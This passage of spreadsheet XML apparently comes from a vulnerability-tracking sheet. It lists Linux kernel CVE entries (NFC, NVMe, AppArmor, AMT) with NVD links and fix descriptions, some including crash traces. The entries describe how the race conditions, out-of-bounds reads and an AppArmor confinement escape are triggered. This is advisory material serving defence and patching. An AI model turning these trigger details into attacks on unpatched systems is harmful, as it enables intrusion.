      <c r="H590" s="5" t="inlineStr"/>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q590" s="5" t="inlineStr"/>
      <c r="R590" s="5" t="inlineStr"/>
      <c r="S590" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: pn533: hold a reference to the request skb during send_frame
__pn533_send_async() publishes the command and then calls
dev-&gt;phy_ops-&gt;send_frame(). Once dev-&gt;cmd is set, an incoming frame
can be matched to this command: the I2C threaded IRQ runs
pn533_recv_frame(), which queues cmd_complete_work, and
pn533_send_async_complete() frees cmd-&gt;req with consume_skb().
On the I2C transport, pn533_i2c_send_frame() still dereferences the same
skb after i2c_master_send() returns, so a completion that races the
send can free the skb while the transport is still using it.
The request skb is owned by the command object and may be freed by
command completion at any time after dev-&gt;cmd is published, so the
transport send path must not assume it stays alive. Hold a temporary
reference to the request skb across the send_frame() call so the
transport always sees a live skb even if completion races the send.
Add a pn533_send_cmd_frame() helper and use it from all three send
paths.</t>
        </is>
      </c>
      <c r="T590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90222</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90223</t>
        </is>
      </c>
      <c r="D591" s="5" t="inlineStr"/>
      <c r="E591" s="5" t="inlineStr"/>
      <c r="F591" s="5" t="inlineStr"/>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="inlineStr"/>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr"/>
      <c r="K591" s="5" t="inlineStr"/>
      <c r="L591" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q591" s="5" t="inlineStr"/>
      <c r="R591" s="5" t="inlineStr"/>
      <c r="S591" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: llcp: bound SNL TLV parsing to the skb and add length checks
nfc_llcp_recv_snl() walked the SNL TLV list using a u16 offset/length
pair derived from skb-&gt;len, without bounding reads to the actual skb
data. Three problems followed:
  - For a short frame (skb-&gt;len &lt; LLCP_HEADER_SIZE), tlv_len underflowed.
  - The per-TLV header (type, length) was read without checking that two
    bytes remained.
  - A declared TLV length could run past the end of the buffer, and an
    SDREQ with length == 0 made "service_name_len = length - 1" underflow
    (size_t), driving an out-of-bounds read in the following strncmp() /
    nfc_llcp_sock_from_sn(). The SDRES case likewise read tlv[2]/tlv[3]
    without a length check.
A nearby NFC device can reach this without authentication; LLCP link
activation happens automatically after NFC-DEP.
Walk the TLV list by pointer, bounded by skb_tail_pointer() over the
linear skb data, and validate each TLV declared length before use. Add
explicit length checks for SDREQ (&gt;= 1) and SDRES (exactly 2).
Found by 0sec automated security-research tooling (https://0sec.ai).</t>
        </is>
      </c>
      <c r="T591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90223</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90224</t>
        </is>
      </c>
      <c r="D592" s="5" t="inlineStr"/>
      <c r="E592" s="5" t="inlineStr"/>
      <c r="F592" s="5" t="inlineStr"/>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="inlineStr"/>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q592" s="5" t="inlineStr"/>
      <c r="R592" s="5" t="inlineStr"/>
      <c r="S592" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: nci: fix double completion race in nci_data_exchange_complete
nci_close_device() and nci_rx_work can both call
nci_data_exchange_complete() concurrently.  After commit 4527025d440ce8
("nfc: nci: fix circular locking dependency in nci_close_device") moved
flush_workqueue(ndev-&gt;rx_wq) after mutex_unlock(&amp;ndev-&gt;req_lock),
rx_work is no longer serialized with the explicit completion call in the
close path.  Both callers read the non-NULL callback pointer and invoke
rawsock_data_exchange_complete(), which calls sock_put() -- but only one
sock_hold() was taken, so the second sock_put() underflows the refcount
and frees the socket while it is still in use.
Replace the bare clear_bit(NCI_DATA_EXCHANGE) with
test_and_clear_bit() so that only the first caller proceeds to invoke
the callback.</t>
        </is>
      </c>
      <c r="T592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90224</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90225</t>
        </is>
      </c>
      <c r="D593" s="5" t="inlineStr"/>
      <c r="E593" s="5" t="inlineStr"/>
      <c r="F593" s="5" t="inlineStr"/>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="inlineStr"/>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr"/>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q593" s="5" t="inlineStr"/>
      <c r="R593" s="5" t="inlineStr"/>
      <c r="S593" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: llcp: read llcp_sock-&gt;local under the socket lock in getsockopt
nfc_llcp_getsockopt() read llcp_sock-&gt;local before lock_sock(sk) and
then dereferenced the cached pointer inside the locked region.
llcp_sock_bind() assigns and clears llcp_sock-&gt;local under the same
socket lock, dropping the last reference on its error path. A
getsockopt() racing an in-flight bind() can observe the pointer, block
on lock_sock(), and then dereference a freed nfc_llcp_local once bind()
has unwound.
Move the llcp_sock-&gt;local read and the NULL check inside the
lock_sock(sk) region so bind() cannot mutate or free the pointer between
the load and the use.</t>
        </is>
      </c>
      <c r="T593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90225</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90226</t>
        </is>
      </c>
      <c r="D594" s="5" t="inlineStr"/>
      <c r="E594" s="5" t="inlineStr"/>
      <c r="F594" s="5" t="inlineStr"/>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="inlineStr"/>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q594" s="5" t="inlineStr"/>
      <c r="R594" s="5" t="inlineStr"/>
      <c r="S594" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: llcp: avoid userspace overflow on invalid optlen
nfc_llcp_getsockopt() casts optval to (u32 __user *) for put_user(), so
the kernel always stores 4 bytes regardless of the caller-supplied
optlen. The existing min_t(u32, len, sizeof(u32)) only clamps the length
reported back to userspace; it does not constrain the store. A call with
optlen &lt; 4 therefore writes past the user buffer, violating the
getsockopt(2) contract for all five supported optnames.
Reject any call with optlen &lt; sizeof(u32) up front. 'len' is int, so a
plain size comparison would promote a negative optlen to size_t and slip
past the check; an explicit 'len &lt; 0' test is added first to catch
negative values before the size compare.</t>
        </is>
      </c>
      <c r="T594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90226</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90227</t>
        </is>
      </c>
      <c r="D595" s="5" t="inlineStr"/>
      <c r="E595" s="5" t="inlineStr"/>
      <c r="F595" s="5" t="inlineStr"/>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="inlineStr"/>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q595" s="5" t="inlineStr"/>
      <c r="R595" s="5" t="inlineStr"/>
      <c r="S595" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme/ioctl: check SUBMIT_IO with nvme_cmd_allowed()
Unlike IO_CMD / IO64_CMD, NVME_IOCTL_SUBMIT_IO never calls
nvme_cmd_allowed(). Unprivileged callers can thus issue I/O on a
partition device or write through a read-only file descriptor.
Pass flags and open_for_write through and reject disallowed commands
with -EACCES.</t>
        </is>
      </c>
      <c r="T595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90227</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90228</t>
        </is>
      </c>
      <c r="D596" s="5" t="inlineStr"/>
      <c r="E596" s="5" t="inlineStr"/>
      <c r="F596" s="5" t="inlineStr"/>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="inlineStr"/>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q596" s="5" t="inlineStr"/>
      <c r="R596" s="5" t="inlineStr"/>
      <c r="S596" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet: fix NULL pointer dereference in nvmet_execute_identify_ns_zns()
When a host issues an Identify command with CNS 05h (I/O Command Set
specific Identify Namespace) and CSI 02h (ZNS) targeting a file-backed
namespace, nvmet_execute_identify_ns_zns() calls bdev_is_zoned() on
req-&gt;ns-&gt;bdev. A file-backed namespace has no block device, so
req-&gt;ns-&gt;bdev is NULL and bdev_is_zoned() dereferences it, oopsing.
The I/O command set is selected by the host-supplied CSI field and the
command is routed here whenever CONFIG_BLK_DEV_ZONED is enabled,
independent of the namespace backing type, so any file-backed namespace
is exposed.
Reject the command with Invalid Field when the namespace is not backed
by a block device.</t>
        </is>
      </c>
      <c r="T596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90228</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90229</t>
        </is>
      </c>
      <c r="D597" s="5" t="inlineStr"/>
      <c r="E597" s="5" t="inlineStr"/>
      <c r="F597" s="5" t="inlineStr"/>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="inlineStr"/>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q597" s="5" t="inlineStr"/>
      <c r="R597" s="5" t="inlineStr"/>
      <c r="S597" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-apple: Destroy the admin queue on removal
The admin queue is allocated with blk_mq_alloc_queue() but never
destroyed. nvme_free_ctrl() only drops the last reference and
blk_mq_exit_queue() and blk_sync_queue() never run: the hctx is never
moved to q-&gt;unused_hctx_list and the timeout timer and work stay armed on
a queue that is about to be freed which will eventually oops inside
blk_mq_timeout_work().
This can only be triggered when the controller fails to come up and is
then immediately torn down again which is why no one ever ran into this
before.
Let's just copy what the pcie driver does: unquiesce and destroy the admin
queue before nvme_uninit_ctrl().
With this the following WARN followed by a panic no longer happens:
  WARNING: block/blk-mq.c:4390 at blk_mq_release+0x194/0x238, CPU#4: kworker/u34:4/119
  CPU: 4 UID: 0 PID: 119 Comm: kworker/u34:4 Not tainted 7.2.0-rc1-dirty #248 PREEMPT
  Hardware name: Apple Mac mini (M1, 2020) (DT)
  Workqueue: nvme-wq apple_nvme_remove_dead_ctrl_work
  pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)
  pc : blk_mq_release+0x194/0x238
  lr : blk_mq_release+0x58/0x238
  sp : ffffc000833a3b50
  x29: ffffc000833a3b50 x28: ffff80001d0450f8 x27: ffff800020c95200
  x26: 0000000000000088 x25: 0000000000000000 x24: ffff800020f36805
  x23: 0000000000000000 x22: ffffc00081a86878 x21: ffff800020be9c60
  x20: 0000000000000000 x19: ffff800022501698 x18: 000000000000000a
  x17: 7365757165722066 x16: 666f7265776f7020 x15: 0000000000000000
  x14: 0000000000000028 x13: 0000000000004def x12: 0000000000000003
  x11: 0000000000000000 x10: 0000000000000000 x9 : ffffc000805b4fc8
  x8 : ffffc00081915820 x7 : ffffc00081c4f3c8 x6 : 0000000000000001
  x5 : 0000000000000004 x4 : ffff800022498d80 x3 : ffffc000833a3b14
  x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff800022501698
  Call trace:
   blk_mq_release+0x194/0x238 (P)
   blk_put_queue+0x8c/0xf0
   nvme_free_ctrl+0x4c/0x260
   device_release+0x44/0x128
   kobject_put+0xa0/0x120
   put_device+0x1c/0x40
   nvme_uninit_ctrl+0x48/0x60
   apple_nvme_remove+0x54/0xb0
   platform_remove+0x28/0x40
   device_remove+0x54/0x98
   device_release_driver_internal+
   device_release_driver+0x20/0x38
   apple_nvme_remove_dead_ctrl_wor
   process_one_work+0x1f4/0x770
   worker_thread+0x1b8/0x360
   kthread+0x140/0x160
   ret_from_fork+0x10/0x20
  irq event stamp: 448
  hardirqs last  enabled at (447):in_unlock_irqrestore+0x74/0x80
  hardirqs last disabled at (448): [&lt;ffffc000811cf5c0&gt;] el1_brk64+0x20/0x60
  softirqs last  enabled at (0): [ess+0xb28/0x2698
  softirqs last disabled at (0): [&lt;0000000000000000&gt;] 0x0
  ---[ end trace 0000000000000000
  Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000
  Mem abort info:
    ESR = 0x0000000096000005
    EC = 0x25: DABT (current EL),
    SET = 0, FnV = 0
    EA = 0, S1PTW = 0
    FSC = 0x05: level 1 translation fault
  Data abort info:
    ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000
    CM = 0, WnR = 0, TnD = 0, TagA
    GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0
  [0000000000000000] user address
  Internal error: Oops: 0000000096000005 [#1]  SMP
  CPU: 7 UID: 0 PID: 54 Comm: kwor          7.2.0-rc1-dirty #248PREEMPT
  Tainted: [W]=WARN
  Hardware name: Apple Mac mini (M1, 2020) (DT)
  Workqueue: kblockd blk_mq_timeou
  pstate: 01400005 (nzcv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)
  pc : percpu_ref_tryget_many.cons
  lr : percpu_ref_tryget_many.constprop.0+0xc0/0x168
  sp : ffffc000829cbce0
  x29: ffffc000829cbce0 x28: ffff800020be9f48 x27: ffff800013e503c0
  x26: 0000000000000108 x25: 000009c05
  x23: 0000000000000000 x22: ffffc000819f5000 x21: ffff800020be9f48
  x20: ffff8001deda4808 x19: ffff8000a
  x17: 00000000580e1fac x16: ffffc00082bbbb7c x15: 0000000000000000
  x14: 0000000000000028 x13: 000000001
  x11: 0000000000000000 x10: 0000000000000000 x9 : ffffc000829cbc20
  x8 : 
---truncated---</t>
        </is>
      </c>
      <c r="T597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90229</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90230</t>
        </is>
      </c>
      <c r="D598" s="5" t="inlineStr"/>
      <c r="E598" s="5" t="inlineStr"/>
      <c r="F598" s="5" t="inlineStr"/>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="inlineStr"/>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q598" s="5" t="inlineStr"/>
      <c r="R598" s="5" t="inlineStr"/>
      <c r="S598" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet: fix heap out-of-bounds read in nvmet_auth_negotiate()
nvmet_execute_auth_send() allocates the DH-HMAC-CHAP message buffer with
the host-supplied transfer length (tl) and hands it to
nvmet_auth_negotiate() without passing tl along. nvmet_auth_negotiate()
then reads the negotiate header and, for each of the halen hash
identifiers and dhlen DH group identifiers, indexes into the fixed
idlist[60] array (hashes at idlist[0..halen), groups at idlist[30..]).
Neither the transfer length nor halen/dhlen is validated. A malicious or
non-conformant host can report a tl smaller than the negotiate structure,
or a halen/dhlen larger than the array (both are u8, up to 255), making
the loops read past the end of the allocated buffer (heap out-of-bounds
read). The sibling nvmet_auth_reply() already validates tl against the
structure size; the negotiate path did not.
Pass tl into nvmet_auth_negotiate(), reject a tl that does not cover the
negotiate data plus one full protocol descriptor, and reject halen/dhlen
larger than NVME_AUTH_DHCHAP_MAX_DH_IDS.</t>
        </is>
      </c>
      <c r="T598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90230</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90231</t>
        </is>
      </c>
      <c r="D599" s="5" t="inlineStr"/>
      <c r="E599" s="5" t="inlineStr"/>
      <c r="F599" s="5" t="inlineStr"/>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="inlineStr"/>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr"/>
      <c r="K599" s="5" t="inlineStr"/>
      <c r="L599" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q599" s="5" t="inlineStr"/>
      <c r="R599" s="5" t="inlineStr"/>
      <c r="S599" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix unconfined user namespace restriction forced stack
If a task is already confined by a stack the unprivileged transition
restriction on unconfined is not correctly, applied. This results in
an escape if two transitions through an unconfined profile can be
executed.
Fix this by pushing the check into the per profile label build. The
check will always be done against unconfined and result in a stack of
just the unconfined component when necessary.</t>
        </is>
      </c>
      <c r="T599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90231</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90232</t>
        </is>
      </c>
      <c r="D600" s="5" t="inlineStr"/>
      <c r="E600" s="5" t="inlineStr"/>
      <c r="F600" s="5" t="inlineStr"/>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="inlineStr"/>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr"/>
      <c r="K600" s="5" t="inlineStr"/>
      <c r="L600" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q600" s="5" t="inlineStr"/>
      <c r="R600" s="5" t="inlineStr"/>
      <c r="S600" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
amt: Don't support cross-netns setup.
When a lower device is unregistered, amt_device_event() tries
to unregister its upper AMT device, but it has two problems.
  1. amt_lookup_upper_dev() looks up an upper device in the
      lower device's netns only
  2. amt_device_event() unregisters a single upper device only
If AMT device is created on a lower device in another netns,
removing the lower device triggers the splat below and gets
stuck until all upper devices are removed. [0]
The cross-netns setup seems unintentional considering 1. and
the following points:
  * amt_link_setup() sets dev-&gt;netns_immutable to true
  * skb_scrub_packet() is not called in the fast path
  * iproute2 binary fails to find cross-netns lower device via
    link-netns:
      # ip -n ns1 link add amt0 link-netns ns2 type amt dev veth1
      Cannot find device "veth1"
Instead of supporting it properly and preparing for per-netns
netdev unreg, let's forbid cross-netns setup.
Note that the problem 2. needs a separate fix.
[0]:
WARNING: net/core/dev.c:12518 at unregister_netdevice_many_notify+0x1cce/0x2250, CPU#48: ip/2031
Modules linked in:
CPU: 48 UID: 0 PID: 2031 Comm: ip Not tainted 7.2.0-rc5+ #27 PREEMPT(full)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014
RIP: 0010:unregister_netdevice_many_notify (net/core/dev.c:12518)
Code: 89 ef e8 d5 52 ae fe e9 d0 f4 ff ff 48 8d 3d f9 3b 9c 02 48 c7 c6 c0 0b 63 84 ba ab 1f 00 00 67 48 0f b9 3a e9 65 ff ff ff 90 &lt;0f&gt; 0b 90 eb 81 48 8d 3d f6 3b 9c 02 48 c7 c6 c0 0b 63 84 ba e2 1f
RSP: 0018:ffffc90004abf160 EFLAGS: 00010212
RAX: ffff888104d38260 RBX: ffff88800b0911b8 RCX: dffffc0000000000
RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffffff85b9f880
RBP: ffffc90004abf2d0 R08: ffffffff85b9f887 R09: 1ffffffff0b73f10
R10: dffffc0000000000 R11: fffffbfff0b73f11 R12: ffff88800b091d08
R13: ffff88800b091178 R14: dffffc0000000000 R15: ffff88800b091000
FS:  00007f555b86c600(0000) GS:ffff8881942a0000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000562107d489c0 CR3: 0000000109a40002 CR4: 0000000000372ef0
Call Trace:
 &lt;TASK&gt;
 rtnl_dellink (net/core/rtnetlink.c:3632 net/core/rtnetlink.c:3674)
 rtnetlink_rcv_msg (net/core/rtnetlink.c:7112)
 netlink_rcv_skb (net/netlink/af_netlink.c:2556)
 netlink_unicast (net/netlink/af_netlink.c:1319)
 netlink_sendmsg (net/netlink/af_netlink.c:1900)
 ____sys_sendmsg (net/socket.c:775)
 __sys_sendmsg (net/socket.c:2738)
 do_syscall_64 (arch/x86/entry/syscall_64.c:63)
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
...
unregister_netdevice: waiting for veth0 to become free. Usage count = 7
ref_tracker: netdev@ffff88800d7496d8 has 3/3 users at
     __netdev_adjacent_dev_insert (./include/linux/netdevice.h:4525 ./include/linux/netdevice.h:4554 net/core/dev.c:8791)
     __netdev_upper_dev_link (net/core/dev.c:8879 net/core/dev.c:8963)
     netdev_upper_dev_link (net/core/dev.c:9009)
     amt_newlink (drivers/net/amt.c:3321)</t>
        </is>
      </c>
      <c r="T600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90232</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90233</t>
        </is>
      </c>
      <c r="D601" s="5" t="inlineStr"/>
      <c r="E601" s="5" t="inlineStr"/>
      <c r="F601" s="5" t="inlineStr"/>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="inlineStr"/>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr"/>
      <c r="L601" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q601" s="5" t="inlineStr"/>
      <c r="R601" s="5" t="inlineStr"/>
      <c r="S601" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-pci: release descriptor pools on probe failure
The per-NUMA-node descriptor DMA pools are created lazily from
nvme_init_hctx_common() once the admin tag set is allocated, but they are
only destroyed in nvme_remove() via nvme_release_descriptor_pools(). Any
probe failure after the admin tag set has been allocated unwinds through
